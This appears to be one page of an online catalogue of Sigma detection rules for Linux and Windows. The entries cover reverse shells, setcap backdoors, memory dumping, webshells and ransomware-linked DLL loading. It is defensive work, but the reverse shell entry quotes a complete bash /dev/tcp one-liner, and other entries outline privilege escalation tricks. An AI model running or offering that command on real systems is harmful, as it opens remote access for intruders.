EXPLORE

EXPLORE DETECTIONS

🔍
3,281 detections found

Linux Network Service Scanning - Auditd

Detects enumeration of local or remote network services.

T1046
Sigmalow

Linux Network Service Scanning Tools Execution

Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.

T1046
Sigmalow

Linux Package Uninstall

Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".

T1070
Sigmalow

Linux Recon Indicators

Detects events with patterns found in commands used for reconnaissance on linux systems

T1592.004T1552.001
Sigmahigh

Linux Remote System Discovery

Detects the enumeration of other remote systems.

T1018
Sigmalow

Linux Reverse Shell Indicator

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

T1059.004
Sigmacritical

Linux Setgid Capability Set on a Binary via Setcap Utility

Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.

T1548T1554
Sigmalow

Linux Setuid Capability Set on a Binary via Setcap Utility

Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.

T1548T1554
Sigmalow

Linux Shell Pipe to Shell

Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell

T1140
Sigmamedium

Linux Sudo Chroot Execution

Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute commands in a modified environment. This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.

T1068
Sigmalow

Linux Webshell Indicators

Detects suspicious sub processes of web server processes

T1505.003
Sigmahigh

Live Memory Dump Using Powershell

Detects usage of a PowerShell command to dump the live memory of a Windows machine

T1003
Sigmahigh

LiveKD Driver Creation

Detects the creation of the LiveKD driver, which is used for live kernel debugging

Sigmamedium

LiveKD Driver Creation By Uncommon Process

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

Sigmahigh

LiveKD Kernel Memory Dump File Created

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

Sigmahigh

Load Of RstrtMgr.DLL By A Suspicious Process

Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

T1486T1685
Sigmahigh

Load Of RstrtMgr.DLL By An Uncommon Process

Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes.

T1486T1685
Sigmalow

LoadBalancer Security Group Modification

Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.

T1190
Sigmamedium

Loaded Module Enumeration Via Tasklist.EXE

Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions.

T1003
Sigmamedium

Loading Diagcab Package From Remote Path

Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability

Sigmahigh

Loading of Kernel Module via Insmod

Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.

T1547.006
Sigmahigh

Local Accounts Discovery

Local accounts, System Owner/User discovery using operating systems utilities

T1033T1087.001
Sigmalow

Local File Read Using Curl.EXE

Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

Sigmamedium

Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet

Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.

T1518.001T1016
Sigmalow
PreviousPage 48 of 137Next